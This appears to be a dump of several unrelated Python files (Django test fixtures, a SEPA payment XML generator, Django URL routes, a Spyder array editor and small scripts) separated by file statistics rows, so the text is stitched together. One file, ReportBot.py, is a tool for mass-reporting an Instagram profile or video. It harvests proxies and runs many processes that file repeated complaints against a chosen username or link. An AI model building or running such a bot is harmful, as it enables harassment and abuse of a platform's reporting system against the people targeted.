email='lestrade@scotlandyard.co.uk',
is_staff=True,
preferred_language='en'
)
user.unit_authorizations.create(subject=resource_in_unit.unit, level=UnitAuthorizationLevel.manager)
return user
@pytest.mark.django_db
@pytest.fixture
def general_admin():
return get_user_model().objects.create(
username='test_general_admin',
first_name='Genie',
last_name='Manager',
email='genie.manager@example.com',
is_staff=True,
is_general_admin=True,
preferred_language='en'
)
@pytest.mark.django_db
@pytest.fixture
def group():
return Group.objects.create(name='test group')
@pytest.mark.django_db
@pytest.fixture
def purpose():
return Purpose.objects.create(name='test purpose', id='test-purpose')
@pytest.fixture
def resource_group(resource_in_unit):
group = ResourceGroup.objects.create(
identifier='test_group',
name='Test resource group'
)
group.resources.set([resource_in_unit])
return group
@pytest.fixture
def resource_group2(resource_in_unit2):
group = ResourceGroup.objects.create(
identifier='test_group_2',
name='Test resource group 2'
)
group.resources.set([resource_in_unit2])
return group
@pytest.fixture
def test_municipality():
municipality = Municipality.objects.create(
id='foo',
name='Foo'
)
return municipality
@pytest.fixture
def accessibility_viewpoint_wheelchair():
vp = {"id": "10", "name_en": "I am a wheelchair user", "order_text": 10}
return AccessibilityViewpoint.objects.create(**vp)
@pytest.fixture
def accessibility_viewpoint_hearing():
vp = {"id": "20", "name_en": "I am hearing impaired", "order_text": 20}
return AccessibilityViewpoint.objects.create(**vp)
@pytest.fixture
def accessibility_value_green():
return AccessibilityValue.objects.create(value='green', order=10)
@pytest.fixture
def accessibility_value_red():
return AccessibilityValue.objects.create(value='red', order=-10)
@pytest.fixture
def resource_with_accessibility_data(resource_in_unit, accessibility_viewpoint_wheelchair,
accessibility_viewpoint_hearing, accessibility_value_green,
accessibility_value_red):
""" Resource is wheelchair accessible, not hearing accessible, unit is accessible to both """
ResourceAccessibility.objects.create(
resource=resource_in_unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
ResourceAccessibility.objects.create(
resource=resource_in_unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_red
)
UnitAccessibility.objects.create(
unit=resource_in_unit.unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit.unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
return resource_in_unit
@pytest.fixture
def resource_with_accessibility_data2(resource_in_unit2, accessibility_viewpoint_wheelchair,
accessibility_viewpoint_hearing, accessibility_value_green,
accessibility_value_red):
""" Resource is hearing accessible, not wheelchair accessible, unit is accessible to both """
ResourceAccessibility.objects.create(
resource=resource_in_unit2,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_red
)
ResourceAccessibility.objects.create(
resource=resource_in_unit2,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit2.unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit2.unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
return resource_in_unit2
@pytest.fixture
def resource_with_accessibility_data3(resource_in_unit3, accessibility_viewpoint_wheelchair,
accessibility_viewpoint_hearing, accessibility_value_green,
accessibility_value_red):
""" Resource is accessible, unit is not """
ResourceAccessibility.objects.create(
resource=resource_in_unit3,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
ResourceAccessibility.objects.create(
resource=resource_in_unit3,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit3.unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_red
)
UnitAccessibility.objects.create(
unit=resource_in_unit3.unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_red
)
return resource_in_unit3
| 29.606796
| 119
| 0.702492
| 1,374
| 12,198
| 5.983988
| 0.140466
| 0.069569
| 0.070056
| 0.041596
| 0.596935
| 0.550596
| 0.498662
| 0.456702
| 0.403308
| 0.334469
| 0
| 0.010521
| 0.205198
| 12,198
| 411
| 120
| 29.678832
| 0.837545
| 0.019101
| 0
| 0.478788
| 0
| 0
| 0.075429
| 0.004353
| 0
| 0
| 0
| 0
| 0
| 1
| 0.112121
| false
| 0
| 0.030303
| 0.060606
| 0.254545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86468125b6e8c3a2e71c1dfdfd2e29f1c5b2af19
| 586
|
py
|
Python
|
qcmetadataprinter/struct.py
|
x2dev/device_leeco_x2
|
9bf4549b5f64390ca4da291745b2a66a8e3f006e
|
[
"FTL"
] | null | null | null |
qcmetadataprinter/struct.py
|
x2dev/device_leeco_x2
|
9bf4549b5f64390ca4da291745b2a66a8e3f006e
|
[
"FTL"
] | null | null | null |
qcmetadataprinter/struct.py
|
x2dev/device_leeco_x2
|
9bf4549b5f64390ca4da291745b2a66a8e3f006e
|
[
"FTL"
] | null | null | null |
#!/bin/python3
with open('../camera/QCamera2/stack/common/cam_intf.h', 'r') as f:
data = f.read()
f.closed
start = data.find(' INCLUDE(CAM_INTF_META_HISTOGRAM')
end = data.find('} metadata_data_t;')
data = data[start:end]
metadata = data.split("\n")
metalist = list()
for line in metadata:
if (line.startswith(' INCLUDE')):
foo = line.split(',')
foo[0] = foo[0].replace('INCLUDE', 'PRINT')
metalist.append(foo[0] + ", pMetadata);")
with open('list.txt', 'w') as f:
for item in metalist:
f.write("%s\n" % item)
f.closed
| 23.44
| 66
| 0.593857
| 84
| 586
| 4.071429
| 0.535714
| 0.035088
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010846
| 0.213311
| 586
| 24
| 67
| 24.416667
| 0.73102
| 0.022184
| 0
| 0.117647
| 0
| 0
| 0.263986
| 0.127622
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8647521d4f7b0429f689d687206113be1ffbd603
| 317
|
py
|
Python
|
abc/abc121/abc121d-2.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | 1
|
2019-08-21T00:49:34.000Z
|
2019-08-21T00:49:34.000Z
|
abc/abc121/abc121d-2.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
abc/abc121/abc121d-2.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
def g(A, n):
if A == -1:
return 0
return A // (2 * n) * n + max(A % (2 * n) - (n - 1), 0)
def f(A, B):
result = 0
for i in range(48):
t = 1 << i
if (g(B, t) - g(A - 1, t)) % 2 == 1:
result += t
return result
A, B = map(int, input().split())
print(f(A, B))
| 16.684211
| 59
| 0.381703
| 59
| 317
| 2.050847
| 0.40678
| 0.049587
| 0.049587
| 0.066116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068783
| 0.403785
| 317
| 18
| 60
| 17.611111
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0
| 0
| 0.384615
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86479efec94998d8ac597979216e69bc35252174
| 807
|
py
|
Python
|
log_mysql.py
|
kizunai/Weather-Scrapy
|
d2104d28dc303f6710b043f9821dcb84c665665d
|
[
"Apache-2.0"
] | null | null | null |
log_mysql.py
|
kizunai/Weather-Scrapy
|
d2104d28dc303f6710b043f9821dcb84c665665d
|
[
"Apache-2.0"
] | null | null | null |
log_mysql.py
|
kizunai/Weather-Scrapy
|
d2104d28dc303f6710b043f9821dcb84c665665d
|
[
"Apache-2.0"
] | null | null | null |
import logging
from logging.handlers import TimedRotatingFileHandler
class MyLog():
def __init__(self, name, filename):
self.logger = logging.getLogger(name)
if not self.logger.handlers:
self.logger.setLevel(logging.INFO)
ch = TimedRotatingFileHandler(filename=filename, when='midnight', encoding="utf-8")
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
self.logger.addHandler(ch)
'''
logger = MyLog("test","log\\text.txt")
logger.logger.debug('debug message')
logger.logger.info('info message')
logger.logger.warning('warn message')
logger.logger.error('error message')
logger.logger.critical('critical message')
'''
| 31.038462
| 97
| 0.675341
| 91
| 807
| 5.945055
| 0.43956
| 0.110906
| 0.140481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001517
| 0.183395
| 807
| 25
| 98
| 32.28
| 0.819423
| 0
| 0
| 0
| 0
| 0
| 0.114236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8647faa20530aa0d730c1a40c079c5454d72f20d
| 1,252
|
py
|
Python
|
src/fiesta/urls.py
|
lerooze/django-fiesta
|
d521f50bcdd3d40e91f0474ec2fa7e256758e0a5
|
[
"BSD-3-Clause"
] | null | null | null |
src/fiesta/urls.py
|
lerooze/django-fiesta
|
d521f50bcdd3d40e91f0474ec2fa7e256758e0a5
|
[
"BSD-3-Clause"
] | 3
|
2019-10-29T23:31:01.000Z
|
2020-03-31T03:08:28.000Z
|
src/fiesta/urls.py
|
lerooze/django-fiesta
|
d521f50bcdd3d40e91f0474ec2fa7e256758e0a5
|
[
"BSD-3-Clause"
] | null | null | null |
# urls.py
from django.urls import path, register_converter
from fiesta import converters
from fiesta.views import views
from rest_framework.urlpatterns import format_suffix_patterns
# "http://django-sdmx.org/wsrest/"
# "http://django-sdmx.org/ws/"
register_converter(converters.ResourceConverter, 'res')
register_converter(converters.AgencyConverter, 'age')
register_converter(converters.ContextConverter, 'con')
urlpatterns = [
path('wsreg/SubmitStructure/', views.SubmitStructureRequestView.as_view()),
path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>', views.SDMXRESTfulSchemaView.as_view()),
path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>/<str:version>', views.SDMXRESTfulSchemaView.as_view()),
path('wsrest/<res:resource>/', views.SDMXRESTfulStructureView.as_view()),
path('wsrest/<res:resource>/<age:agencyID>/',
views.SDMXRESTfulStructureView.as_view()),
path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/',
views.SDMXRESTfulStructureView.as_view()),
path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/'
'<str:version>/',
views.SDMXRESTfulStructureView.as_view()),
]
urlpatterns = format_suffix_patterns(urlpatterns)
| 40.387097
| 125
| 0.742812
| 136
| 1,252
| 6.720588
| 0.308824
| 0.045952
| 0.065646
| 0.105033
| 0.484683
| 0.484683
| 0.40372
| 0.370897
| 0.370897
| 0.370897
| 0
| 0
| 0.099042
| 1,252
| 30
| 126
| 41.733333
| 0.810284
| 0.055112
| 0
| 0.142857
| 0
| 0
| 0.29202
| 0.272496
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.190476
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864838cbb6dc59b795206fdcacaeae0f4be0ca16
| 9,159
|
py
|
Python
|
sepa_generator/definitions.py
|
jason-gm/python_sepa
|
542c48326c07ab68d341a07d5ee12502f7248690
|
[
"MIT"
] | null | null | null |
sepa_generator/definitions.py
|
jason-gm/python_sepa
|
542c48326c07ab68d341a07d5ee12502f7248690
|
[
"MIT"
] | null | null | null |
sepa_generator/definitions.py
|
jason-gm/python_sepa
|
542c48326c07ab68d341a07d5ee12502f7248690
|
[
"MIT"
] | null | null | null |
def construct_tag_data(tag_name, attrs=None, value=None, sorting=None):
data = {
'_name': tag_name,
'_attrs': attrs or [],
'_value': value,
}
if sorting:
data['_sorting'] = sorting
return data
def add_simple_child(data, child_friendly_name, child_tag_name, child_attrs=None, child_value=None):
data[child_friendly_name] = construct_tag_data(child_tag_name, child_attrs, child_value)
return data
def construct_header(ctransfer):
header = construct_tag_data('GrpHdr')
header['_sorting'] = ['MsgId', 'CreDtTm', 'NbOfTxs', 'CtrlSum', 'InitgPty']
header['message_id'] = construct_tag_data('MsgId', value=ctransfer.uuid)
header['creation_date_time'] = construct_tag_data('CreDtTm', value=ctransfer.timestamp)
header['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions())
header['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum())
header['initiating_party'] = add_simple_child(construct_tag_data('InitgPty'), 'name', 'Nm', [],
ctransfer.debtor.name)
return header
def construct_iban(account, tag_name):
iban_data = construct_tag_data(tag_name)
iban_data['id'] = add_simple_child(construct_tag_data('Id'), 'iban', 'IBAN', [], account.iban)
return iban_data
def construct_bic(account, tag_name):
bic_data = construct_tag_data(tag_name)
bic_data['financial_instrument_id'] = add_simple_child(construct_tag_data('FinInstnId'), 'bic', 'BIC', [],
account.bic)
return bic_data
def construct_address_data(account, tag_name):
addr_data = construct_tag_data(tag_name)
addr_data['name'] = construct_tag_data('Nm', value=account.name)
if account.has_address():
address = construct_tag_data('PstlAdr')
if account.country:
address['country'] = construct_tag_data('Ctry', value=account.country)
if account.street:
address['addr_line_1'] = construct_tag_data('AdrLine', value=account.street)
if account.postcode and account.city:
address['addr_line_2'] = construct_tag_data('AdrLine', value="%s %s" % (account.postcode, account.city))
addr_data['address'] = address
return addr_data
def construct_transaction_data(ctransfer, transaction):
transaction_information = construct_tag_data('CdtTrfTxInf')
transaction_information['_sorting'] = ['PmtId', 'Amt', 'ChrgBr', 'UltmtDbtr', 'CdtrAgt', 'Cdtr', 'CdtrAcct',
'UltmtCdtr', 'Purp', 'RmtInf']
transaction_information['payment_id'] = add_simple_child(
data=add_simple_child(data=construct_tag_data('PmtId', sorting=['InstrId', 'EndToEndId']),
child_friendly_name='instruction',
child_tag_name='InstrId',
child_value=transaction.uuid),
child_friendly_name='eref',
child_tag_name='EndToEndId',
child_value=transaction.eref)
transaction_information['amount'] = add_simple_child(data=construct_tag_data('Amt'),
child_friendly_name='amount',
child_tag_name='InstdAmt',
child_attrs=[('Ccy', ctransfer.currency)],
child_value=transaction.get_amount())
transaction_information['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV')
if ctransfer.debtor.use_ultimate:
transaction_information['ultimate_debtor'] = add_simple_child(data=construct_tag_data('UltmtDbtr'),
child_friendly_name='name',
child_tag_name='Nm',
child_value=ctransfer.debtor.name)
transaction_information['creditor_agent'] = construct_bic(transaction.creditor, 'CdtrAgt')
transaction_information['creditor_data'] = construct_address_data(transaction.creditor, 'Cdtr')
transaction_information['creditor_account'] = construct_iban(transaction.creditor, 'CdtrAcct')
if transaction.creditor.use_ultimate:
transaction_information['ultimate_creditor'] = add_simple_child(data=construct_tag_data('UltmtCdtr'),
child_friendly_name='name',
child_tag_name='Nm',
child_value=transaction.creditor.name)
transaction_information['purpose'] = add_simple_child(data=construct_tag_data('Purp'),
child_friendly_name='code',
child_tag_name='Cd',
child_value=transaction.ext_purpose)
if not transaction.use_structured:
transaction_information['remote_inf'] = add_simple_child(data=construct_tag_data('RmtInf'),
child_friendly_name='unstructured',
child_tag_name='Ustrd',
child_value=transaction.purpose)
else:
rmt_inf = construct_tag_data('RmtInf')
rmt_inf_strd = add_simple_child(data=construct_tag_data('Strd'),
child_friendly_name='additional_info',
child_tag_name='AddtlRmtInf',
child_value=transaction.purpose)
rmt_tp = construct_tag_data('Tp')
rmt_tp['code_or_property'] = add_simple_child(data=construct_tag_data('CdOrPrtry'),
child_friendly_name='code',
child_tag_name='Cd',
child_value='SCOR')
rmt_creditor_ref_inf = add_simple_child(data=construct_tag_data('CdtrRefInf'),
child_friendly_name='reference',
child_tag_name='Ref',
child_value=transaction.cref)
rmt_creditor_ref_inf['tp'] = rmt_tp
rmt_inf_strd['creditor_ref_information'] = rmt_creditor_ref_inf
rmt_inf['structured'] = rmt_inf_strd
transaction_information['remote_inf'] = rmt_inf
return transaction_information
def construct_payment_information(ctransfer):
payment_inf = construct_tag_data('PmtInf')
payment_inf['_sorting'] = ['PmtInfId', 'PmtMtd', 'BtchBookg', 'NbOfTxs', 'CtrlSum', 'PmtTpInf', 'ReqdExctnDt',
'Dbtr', 'DbtrAcct', 'DbtrAgt', 'ChrgBr', 'CdtTrfTxInf']
payment_inf['payment_id'] = construct_tag_data('PmtInfId', value=ctransfer.payment_id)
payment_inf['payment_method'] = construct_tag_data('PmtMtd', value='TRF')
payment_inf['batch'] = construct_tag_data('BtchBookg', value=str(ctransfer.batch).lower())
payment_inf['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions())
payment_inf['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum())
payment_instruction = construct_tag_data('PmtTpInf')
payment_instruction['_sorting'] = ['InstrPrty', 'SvcLvl']
payment_instruction['priority'] = construct_tag_data('InstrPrty', value='NORM')
payment_instruction['service_level'] = add_simple_child(construct_tag_data('SvcLvl'), 'code', 'Cd', [], 'SEPA')
payment_inf['instruction'] = payment_instruction
payment_inf['requested_execution_time'] = construct_tag_data('ReqdExctnDt', value=ctransfer.execution_time)
payment_inf['debtor'] = construct_address_data(ctransfer.debtor, 'Dbtr')
payment_inf['debtor_account'] = construct_iban(ctransfer.debtor, 'DbtrAcct')
payment_inf['debtor_agent'] = construct_bic(ctransfer.debtor, 'DbtrAgt')
payment_inf['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV')
for i, payment in enumerate(ctransfer.transactions):
transfer_information = construct_transaction_data(ctransfer, payment)
payment_inf['transfer_no_%s' % i] = transfer_information
return payment_inf
def construct_document(ctransfer):
root = construct_tag_data('Document', [('xmlns', 'urn:iso:std:iso:20022:tech:xsd:pain.001.001.03')])
message = construct_tag_data('CstmrCdtTrfInitn')
message['_sorting'] = ['GrpHdr', 'PmtInf']
message['header'] = construct_header(ctransfer)
message['payment_information'] = construct_payment_information(ctransfer)
root['message'] = message
return root
| 48.460317
| 116
| 0.601048
| 902
| 9,159
| 5.720621
| 0.174058
| 0.102326
| 0.136434
| 0.046512
| 0.242636
| 0.202907
| 0.175581
| 0.117054
| 0.086047
| 0.086047
| 0
| 0.002314
| 0.292172
| 9,159
| 188
| 117
| 48.718085
| 0.793614
| 0
| 0
| 0.088889
| 0
| 0.007407
| 0.148395
| 0.012776
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864bf69490c6ee45920463f0c6f8b0b6dbff18dc
| 4,624
|
py
|
Python
|
ReportBot.py
|
SeveNNoff/InstagramReportBot
|
0a613b5f2733d988a952d64d8141cb7390527b9e
|
[
"Apache-2.0"
] | 1
|
2020-10-13T16:04:08.000Z
|
2020-10-13T16:04:08.000Z
|
ReportBot.py
|
SeveNNoff/InstagramReportBot
|
0a613b5f2733d988a952d64d8141cb7390527b9e
|
[
"Apache-2.0"
] | null | null | null |
ReportBot.py
|
SeveNNoff/InstagramReportBot
|
0a613b5f2733d988a952d64d8141cb7390527b9e
|
[
"Apache-2.0"
] | 1
|
2021-04-17T04:42:29.000Z
|
2021-04-17T04:42:29.000Z
|
# coding=utf-8
#!/usr/bin/env python3
from libs.check_modules import check_modules
from sys import exit
from os import _exit
check_modules()
from os import path
from libs.logo import print_logo
from libs.utils import print_success
from libs.utils import print_error
from libs.utils import ask_question
from libs.utils import print_status
from libs.utils import parse_proxy_file
from libs.proxy_harvester import find_proxies
from libs.attack import report_profile_attack
from libs.attack import report_video_attack
from multiprocessing import Process
from colorama import Fore, Back, Style
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def profile_attack_process(username, proxy_list):
if (len(proxy_list) == 0):
for _ in range(10):
report_profile_attack(username, None)
return
for proxy in proxy_list:
report_profile_attack(username, proxy)
def video_attack_process(video_url, proxy_list):
if (len(proxy_list) == 0):
for _ in range(10):
report_video_attack(video_url, None)
return
for proxy in proxy_list:
report_video_attack(video_url, proxy)
def video_attack(proxies):
video_url = ask_question("Enter the link of the video you want to report")
print(Style.RESET_ALL)
if (len(proxies) == 0):
for k in range(5):
p = Process(target=video_attack_process, args=(video_url, [],))
p.start()
print_status(str(k + 1) + ". Transaction Opened!")
if (k == 5): print()
return
chunk = list(chunks(proxies, 10))
print("")
print_status("Video complaint attack is on!\n")
i = 1
for proxy_list in chunk:
p = Process(target=video_attack_process, args=(video_url, proxy_list,))
p.start()
print_status(str(i) + ". Transaction Opened!")
if (k == 5): print()
i = i + 1
def profile_attack(proxies):
username = ask_question("Enter the username of the person you want to report")
print(Style.RESET_ALL)
if (len(proxies) == 0):
for k in range(5):
p = Process(target=profile_attack_process, args=(username, [],))
p.start()
print_status(str(k + 1) + ". Transaction Opened!")
return
chunk = list(chunks(proxies, 10))
print("")
print_status("Profile complaint attack is starting!\n")
i = 1
for proxy_list in chunk:
p = Process(target=profile_attack_process, args=(username, proxy_list,))
p.start()
print_status(str(i) + ". Transaction Opened!")
if (k == 5): print()
i = i + 1
def main():
print_success("Modules loaded!\n")
ret = ask_question("Would you like to use a proxy? [Y / N]")
proxies = []
if (ret == "Y" or ret == "y"):
ret = ask_question("Would you like to collect your proxies from the internet? [Y / N]")
if (ret == "Y" or ret == "y"):
print_status("Gathering proxy from the Internet! This may take a while.\n")
proxies = find_proxies()
elif (ret == "N" or ret == "n"):
print_status("Please have a maximum of 50 proxies in a file!")
file_path = ask_question("Enter the path to your proxy list")
proxies = parse_proxy_file(file_path)
else:
print_error("Answer not understood, exiting!")
exit()
print_success(str(len(proxies)) + " Number of proxy found!\n")
elif (ret == "N" or ret == "n"):
pass
else:
print_error("Answer not understood, exiting!")
exit()
print("")
print_status("1 - Report Profile.")
print_status("2 - Report a video.")
report_choice = ask_question("Please select the complaint method")
print("")
if (report_choice.isdigit() == False):
print_error("The answer is not understood.")
exit(0)
if (int(report_choice) > 2 or int(report_choice) == 0):
print_error("The answer is not understood.")
exit(0)
if (int(report_choice) == 1):
profile_attack(proxies)
elif (int(report_choice) == 2):
video_attack(proxies)
if __name__ == "__main__":
print_logo()
try:
main()
print(Style.RESET_ALL)
except KeyboardInterrupt:
print("\n\n" + Fore.RED + "[*] Program is closing!")
print(Style.RESET_ALL)
_exit(0)
| 30.421053
| 96
| 0.599048
| 611
| 4,624
| 4.360065
| 0.211129
| 0.04542
| 0.024399
| 0.035661
| 0.479354
| 0.418544
| 0.395646
| 0.374625
| 0.324324
| 0.201201
| 0
| 0.01125
| 0.288711
| 4,624
| 152
| 97
| 30.421053
| 0.798723
| 0.016436
| 0
| 0.466102
| 0
| 0
| 0.175131
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050847
| false
| 0.008475
| 0.127119
| 0
| 0.211864
| 0.279661
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864d054eec7d0aab41c1311c42de1bf952355469
| 33,765
|
py
|
Python
|
spyder/plugins/variableexplorer/widgets/arrayeditor.py
|
seryj/spyder
|
acea4f501c1a04d57b02e5e817708a69b503f430
|
[
"MIT"
] | null | null | null |
spyder/plugins/variableexplorer/widgets/arrayeditor.py
|
seryj/spyder
|
acea4f501c1a04d57b02e5e817708a69b503f430
|
[
"MIT"
] | null | null | null |
spyder/plugins/variableexplorer/widgets/arrayeditor.py
|
seryj/spyder
|
acea4f501c1a04d57b02e5e817708a69b503f430
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
NumPy Array Editor Dialog based on Qt
"""
# pylint: disable=C0103
# pylint: disable=R0903
# pylint: disable=R0911
# pylint: disable=R0201
# Standard library imports
from __future__ import print_function
# Third party imports
from qtpy.compat import from_qvariant, to_qvariant
from qtpy.QtCore import (QAbstractTableModel, QItemSelection, QLocale,
QItemSelectionRange, QModelIndex, Qt, Slot)
from qtpy.QtGui import QColor, QCursor, QDoubleValidator, QKeySequence
from qtpy.QtWidgets import (QAbstractItemDelegate, QApplication, QCheckBox,
QComboBox, QDialog, QDialogButtonBox, QGridLayout,
QHBoxLayout, QInputDialog, QItemDelegate, QLabel,
QLineEdit, QMenu, QMessageBox, QPushButton,
QSpinBox, QStackedWidget, QTableView, QVBoxLayout,
QWidget)
import numpy as np
# Local imports
from spyder.config.base import _
from spyder.config.fonts import DEFAULT_SMALL_DELTA
from spyder.config.gui import get_font, config_shortcut
from spyder.py3compat import (io, is_binary_string, is_string,
is_text_string, PY3, to_binary_string,
to_text_string)
from spyder.utils import icon_manager as ima
from spyder.utils.qthelpers import add_actions, create_action, keybinding
# Note: string and unicode data types will be formatted with '%s' (see below)
SUPPORTED_FORMATS = {
'single': '%.6g',
'double': '%.6g',
'float_': '%.6g',
'longfloat': '%.6g',
'float16': '%.6g',
'float32': '%.6g',
'float64': '%.6g',
'float96': '%.6g',
'float128': '%.6g',
'csingle': '%r',
'complex_': '%r',
'clongfloat': '%r',
'complex64': '%r',
'complex128': '%r',
'complex192': '%r',
'complex256': '%r',
'byte': '%d',
'bytes8': '%s',
'short': '%d',
'intc': '%d',
'int_': '%d',
'longlong': '%d',
'intp': '%d',
'int8': '%d',
'int16': '%d',
'int32': '%d',
'int64': '%d',
'ubyte': '%d',
'ushort': '%d',
'uintc': '%d',
'uint': '%d',
'ulonglong': '%d',
'uintp': '%d',
'uint8': '%d',
'uint16': '%d',
'uint32': '%d',
'uint64': '%d',
'bool_': '%r',
'bool8': '%r',
'bool': '%r',
}
LARGE_SIZE = 5e5
LARGE_NROWS = 1e5
LARGE_COLS = 60
#==============================================================================
# Utility functions
#==============================================================================
def is_float(dtype):
"""Return True if datatype dtype is a float kind"""
return ('float' in dtype.name) or dtype.name in ['single', 'double']
def is_number(dtype):
"""Return True is datatype dtype is a number kind"""
return is_float(dtype) or ('int' in dtype.name) or ('long' in dtype.name) \
or ('short' in dtype.name)
def get_idx_rect(index_list):
"""Extract the boundaries from a list of indexes"""
rows, cols = list(zip(*[(i.row(), i.column()) for i in index_list]))
return ( min(rows), max(rows), min(cols), max(cols) )
#==============================================================================
# Main classes
#==============================================================================
class ArrayModel(QAbstractTableModel):
"""Array Editor Table Model"""
ROWS_TO_LOAD = 500
COLS_TO_LOAD = 40
def __init__(self, data, format="%.6g", xlabels=None, ylabels=None,
readonly=False, parent=None):
QAbstractTableModel.__init__(self)
self.dialog = parent
self.changes = {}
self.xlabels = xlabels
self.ylabels = ylabels
self.readonly = readonly
self.test_array = np.array([0], dtype=data.dtype)
# for complex numbers, shading will be based on absolute value
# but for all other types it will be the real part
if data.dtype in (np.complex64, np.complex128):
self.color_func = np.abs
else:
self.color_func = np.real
# Backgroundcolor settings
huerange = [.66, .99] # Hue
self.sat = .7 # Saturation
self.val = 1. # Value
self.alp = .6 # Alpha-channel
self._data = data
self._format = format
self.total_rows = self._data.shape[0]
self.total_cols = self._data.shape[1]
size = self.total_rows * self.total_cols
try:
self.vmin = np.nanmin(self.color_func(data))
self.vmax = np.nanmax(self.color_func(data))
if self.vmax == self.vmin:
self.vmin -= 1
self.hue0 = huerange[0]
self.dhue = huerange[1]-huerange[0]
self.bgcolor_enabled = True
except (TypeError, ValueError):
self.vmin = None
self.vmax = None
self.hue0 = None
self.dhue = None
self.bgcolor_enabled = False
# Use paging when the total size, number of rows or number of
# columns is too large
if size > LARGE_SIZE:
self.rows_loaded = self.ROWS_TO_LOAD
self.cols_loaded = self.COLS_TO_LOAD
else:
if self.total_rows > LARGE_NROWS:
self.rows_loaded = self.ROWS_TO_LOAD
else:
self.rows_loaded = self.total_rows
